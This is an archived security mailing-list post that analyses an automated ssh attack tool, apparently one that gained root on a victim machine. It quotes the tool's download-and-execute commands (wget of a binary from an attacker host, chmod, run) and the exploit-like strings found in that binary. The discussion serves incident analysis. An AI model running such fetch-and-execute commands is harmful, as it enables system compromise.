lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <412E5235.7010302@thievco.com>
From: BlueBoar at thievco.com (Blue Boar)
Subject: Betr.: RE: Automated ssh scanning

Todd Towles wrote:

> It could be, but he said it was patched. I didn't run the test of
> course. 
> 
> I never said it was the kernel however, it could be a service running.
> And unknown does not equal zero-day. But the tool got root and he
> doesn't know how. That is the point. Kernel, old service, whatever. It
> would be nice to find it.

If you take a look at this bit:

wget www.bo2k-rulez.net/a
chmod +x a
./a

The file "a" gives every superficial indication that it's a kernel 
exploit, if you want to go by a 20-second Notepad analysis:

[-] Unable to exit, entering neverending loop.
                  Kernel seems not to be vulnerable double allocation
             Unable to determine kernel address Unable to set up LDT 
      Unable to change page protection Invalid LDT entry Unable to jump 
to call gate /bin/sh Unable to spawn shell
                    PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to 
allocate memory Unable to unmap stack Unable to expand BSS 
/proc/sys/kernel/osrelease FATAL: kernel too old
        FATAL: cannot determine library version
  /dev/null  ;?..;?..(?..??..??..                        malloc: using 
debugging hooks
   realloc(): invalid pointer %p!
  malloc: top chunk is corrupt
  Arena %d:
  system bytes     = %10u
  in use bytes     = %10u
  Total (incl. mmap):
  max mmap regions = %10u
  max mmap bytes   = %10lu
  free(): invalid pointer %p!
  TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_

						BB


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ